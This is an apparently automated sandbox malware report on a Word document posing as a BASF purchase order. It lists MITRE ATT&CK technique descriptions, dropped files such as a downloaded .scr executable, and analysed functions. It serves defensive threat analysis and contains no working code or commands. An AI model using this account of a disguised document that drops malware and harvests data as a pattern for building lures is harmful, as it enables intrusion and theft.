Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BASF Purchase Order.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharon[1].scr

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlite-dll-win32-x86-3390000[1].zip

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68910914.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D6B5528C-BFB8-4790-8015-41F6DA2A2FE7}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A01D4A1-178B-4603-9BE4-7DECA3DA952D}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6D25CF23-6A72-4510-8E0A-5A45DD580DCB}.tmp

C:\Users\user\AppData\Local\Temp\13d6pS3

C:\Users\user\AppData\Local\Temp\q4y4nra8.zip

C:\Users\user\AppData\Local\Temp\sqlite3.def

C:\Users\user\AppData\Local\Temp\sqlite3.dll

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BASF Purchase Order.LNK

Windows Analysis Report
BASF Purchase Order.doc

Function 001D407F Relevance: 1.9, Strings: 1, Instructions: 623
COMMON

Function 001D4BB4 Relevance: 1.7, APIs: 1, Instructions: 224
processCOMMON

Function 001D4BC0 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Function 001D3C60 Relevance: 1.6, APIs: 1, Instructions: 119
injectionCOMMON

Function 001D3C68 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Function 001D3DBC Relevance: 1.6, APIs: 1, Instructions: 102
memoryCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre